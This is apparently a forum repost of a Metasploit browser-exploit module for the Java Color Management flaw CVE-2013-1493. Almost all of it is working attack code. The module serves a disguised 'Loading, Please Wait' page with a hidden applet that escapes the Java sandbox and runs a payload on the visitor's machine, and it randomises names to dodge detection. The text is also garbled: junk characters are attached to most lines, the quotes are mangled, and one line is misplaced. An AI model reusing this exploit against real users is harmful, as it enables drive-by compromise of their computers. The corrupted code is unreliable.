##
. c2 y6 f( T p* K/ Y" t4 _& A0 e+ A n* B" D- R
# This file is part of the Metasploit Framework and may be subject to
0 F3 O1 z* [& F V" l# redistribution and commercial restrictions. Please see the Metasploit: k. h( u+ O: x& F2 v, M! O Y+ N
# web site for more information on licensing and terms of use.
1 q( O# W) e+ Z/ s, `6 Z# http://metasploit.com/
% e4 t7 S/ d5 w3 }3 u" r##1 `& i, O- K1 n# x, H& _5 H7 N
require ‘msf/core’1 g. e, A5 a' p9 j' L5 m
require ‘rex’
! @$ K) O% y4 g) v" L- }( Tclass Metasploit3 < Msf::Exploit::Remote
* F* E- D: b! s U: x* t. `+ rRank = NormalRanking( j# a, |" G: D- W* _7 c+ a
include Msf::Exploit::Remote::HttpServer::HTML' O& C! F/ {4 @7 E
include Msf::Exploit::EXE0 t! C" C u, G, k3 V
include Msf::Exploit::Remote::BrowserAutopwn
" s$ i% b; w) Tautopwn_info({ :javascript => false })5 r3 g7 b" y" N9 {7 _ x
def initialize( info = {} )! J$ H& F; z# n6 b5 c/ c
super( update_info( info,3 Z/ f3 k) n2 ~
‘Name’ => ‘Java CMM Remote Code Execution’,
8 p* q, Q1 y1 m9 |‘Description’ => %q{
; v, a. d v, T" a* ^' I! HThis module abuses the Color Management classes from a Java Applet to run* x4 y \* f$ C0 Q' v
arbitrary Java code outside of the sandbox as exploited in the wild in February
; U4 t x* q+ ~$ }- y. u0 p3 qand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
, J" T4 G1 v& z5 j8 _6 jand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
6 A0 e) ~* E5 g3 j% l. Nsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
+ T: |) f6 g* rwarning in order to run the malicious applet.
+ m- X" |, F# a},
! B H3 i- b; O3 }‘License’ => MSF_LICENSE,
7 e, @* M9 {& k# A" R‘Author’ =>
1 ~; r. [, o, B" `" i) x'Unknown', # Vulnerability discovery and Exploit/ M" @! |8 @8 B
'juan vazquez' # Metasploit module (just ported the published exploit)' k) F6 N4 g+ l% N
],+ h7 A' J, o' e% C# {/ t' \
‘References’ =>
9 M. m. j/ J/ |' k1 f' j" k[
: G2 ]2 z5 D8 N8 o4 r! U% y: R- o[ 'CVE', '2013-1493' ],/ @) N b; v5 F: H! f* t
[ 'OSVDB', '90737' ],4 X4 r) a5 G0 t- g9 I1 k
[ 'BID', '58238' ],
* j) ^5 Z- v! n# b$ N! w% [3 h' ~[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],8 G) l( j. E; d$ q) V
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],: q. O0 Z% A+ T0 `$ C. y. ]
[ 'URL', 'http://pastie.org/pastes/6581034' ]; g) \& q6 \6 ~2 q
],
4 R' T& D" x. t7 C& v' X: k‘Platform’ => [ 'win', 'java' ],5 @0 S0 H! I- F7 n( {" G! w
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },8 f, J1 }2 }& b* @+ u. P
‘Targets’ =>0 |, ?$ S- p* Q* f* t' z( {
[
# x. u% D6 C; P5 u2 m9 A! c[ 'Generic (Java Payload)',
+ O3 N1 z) e% n: E; ^7 y{
* {) A, P: `1 W+ @: p'Platform' => 'java',
0 y: i* [+ y J'Arch' => ARCH_JAVA) S) Q4 ` n* L4 _6 N" A
}7 U% g. L" t+ m9 R# f
],
% O6 W9 H% d1 {7 ]5 ][ 'Windows x86 (Native Payload)',! r# _) q6 L3 g# ~1 ^
{
, P$ R' H* t5 U'Platform' => 'win',
0 i1 B3 \6 {- q5 d& Q'Arch' => ARCH_X866 u/ [0 r# N6 z$ I& I
}
* N1 J1 y& M+ E* k+ I]3 ~9 N* h- \: o: Y/ o
],
2 V& L7 ~, R+ L$ z- L1 D% T‘‘DisclosureDate’ => ‘Mar 01 2013′8 C7 {3 M9 L6 Z/ e5 a2 x* B
))
% H! A! ^# K) |5 Y4 h* n3 A8 t1 vend# p$ C4 l' Y$ G! i; E
def setup
; ?& A6 ?5 Y- T$ npath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
6 p7 t. C: p2 d9 n/ _* m" W( c@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }0 j( |, S7 {. [, z- W3 @& T
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
# {0 d. e/ F' U, r@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }4 S* n5 r, }* g1 D5 ]: H2 {, t3 w$ Z
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)$ M$ J7 _. \, X; H `$ r8 Y7 I
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }( j. X- u8 l# n) B
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
: N# a, m; r" h0 z# G@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
; d$ m# S: N# ^6 v8 w@init_class_name = rand_text_alpha(“Init”.length)! \$ v8 b' F1 p& c
@init_class.gsub!(“Init”, @init_class_name)7 X' D6 C; f$ o$ X
super% s" H3 [& I) X/ z) c5 Z" u3 b
end7 ]* }# [3 K- S! @1 Y
def on_request_uri(cli, request)% G& f1 i v0 n! m1 {, s; Y. t
print_status(“handling request for #{request.uri}”)
: ` n* Y, @; i: c$ |case request.uri
" _* x5 _2 Z- X! F! D" N% Nwhen /\.jar$/i
0 ]+ I# b0 K* y' y. b5 B9 M( Pjar = payload.encoded_jar2 p. M7 y* Q$ P4 H3 s9 F4 x" K
jar.add_file(“#{@init_class_name}.class”, @init_class)$ m) _* p- h% f8 ~
jar.add_file(“Leak.class”, @leak_class)7 u1 a3 r. _ H# U1 h- \) A
jar.add_file(“MyBufferedImage.class”, @buffered_image_class) |* o, H5 d% ~% w$ j+ H
jar.add_file(“MyColorSpace.class”, @color_space_class)
* x# N1 X1 g4 i1 L [$ b8 yDefaultTarget’ => 1,
# }% b; n/ v/ j& a) H, `5 _metasploit_str = rand_text_alpha(“metasploit”.length)6 A. w, h7 d( O' g
payload_str = rand_text_alpha(“payload”.length)
8 l" n. N, l; C, B; |5 E) ?jar.entries.each { |entry|4 s6 I" e$ O* u2 j; p/ \, H' l
entry.name.gsub!(“metasploit”, metasploit_str)* D; R$ {5 b+ X; i, J4 S
entry.name.gsub!(“Payload”, payload_str)
! e& g" d# P: p: Nentry.data = entry.data.gsub(“metasploit”, metasploit_str)
5 [6 i" m1 s% d$ R, ^5 rentry.data = entry.data.gsub(“Payload”, payload_str)+ M& }* @! M% c- i9 i k* l/ P- a
}' z! t1 [7 I: U* X' Z
jar.build_manifest
. w) u* ~7 {* O0 b5 w9 Y6 Nsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })' P7 K6 p" T- W* ], S
when /\/$/9 w/ a! F5 w- J# r
payload = regenerate_payload(cli)5 ^' B7 q3 K9 h7 g& r
if not payload l+ O# ^8 B) v
print_error(“Failed to generate the payload.”)- q" ^( j% ?! A% ]$ _' j
send_not_found(cli)0 L5 B) d& G S* @3 J4 |$ F
return! c! R4 z, a, @
end# H; ~% n$ Z' g: Z) B. t
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })8 y$ [/ T: s; i2 r& S
else
+ u; ^3 R4 r+ G/ q# x( d9 Tsend_redirect(cli, get_resource() + ‘/’, ”)5 y2 O$ M( a: x* z9 g
end
; Z. U; j* @) o) k( J2 t& ^2 oend
1 N* m/ q6 T" Y7 s# E1 ?/ Odef generate_html8 p; G4 h8 \# c. ]8 G. ]( ~
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
8 Q) c4 x: B' r( ?* z4 L6 P% w2 ihtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
, ]: Q# @& N, I! bhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|4 d9 x+ _5 ^' a" y
html += %Q|</applet></body></html>|
% }$ p* }" u9 j6 n+ b1 a2 oreturn html; a* O& k* Q1 ~& g( |2 D
end
% L% D/ s" x6 send
7 d: r9 z, X& y' V/ |' S1 Cend
. P- o5 N6 i- g i8 ` b |
发表于 2013-4-4 17:31:17
收藏
支持
反对